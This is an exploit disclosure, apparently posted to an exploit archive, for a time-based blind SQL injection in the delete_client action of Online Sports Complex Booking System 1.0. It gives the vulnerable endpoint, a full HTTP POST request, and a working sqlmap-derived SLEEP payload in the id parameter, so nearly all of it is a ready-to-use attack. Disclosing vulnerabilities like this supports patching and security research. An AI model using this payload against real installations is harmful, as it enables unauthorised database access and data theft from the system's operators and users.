Online Sports Complex Booking System 1.0 SQL Injection

`#### Title: Online Sports Complex Booking System 1.0 SQL Injection  
#### Author: Zllggggg  
#### Vendor: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html  
#### Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scbs_1.zip  
#### Reference: https://github.com/playZG/Exploit-/blob/main/Online%20Sports%20Complex%20Booking%20System/Online%20Sports%20Complex%20Booking%20System%201.0%20SQL%20Injection(%E4%BA%8C).md  
#### Tested on: Windows, MySQL, Apache  
  
After entering the background, click the registered clients navigation, select a piece of data and click delete  
  
[image: 1648884355.jpg]  
  
Find the corresponding source code and find that the ID parameter passed by  
post does not have any filtering  
  
[image: 1648884613.jpg]  
  
The vulnerability is also verified in sqlmap   
  
[image: 1648884408.jpg]  
  
Data packet  
```  
POST /scbs/classes/Users.php?f=delete_client HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0)  
Gecko/20100101 Firefox/98.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language:  
zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 4  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/scbs/admin/?page=clients  
Cookie: PHPSESSID=trkbdt4th4hlsp7bpriuih1816  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
  
id=2  
```  
  
Payload  
```  
Parameter: id (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: id=1' AND (SELECT 4836 FROM (SELECT(SLEEP(5)))QbFZ) AND  
'aPSM'='aPSM  
---  
```  
  
  
  
  
  
  
`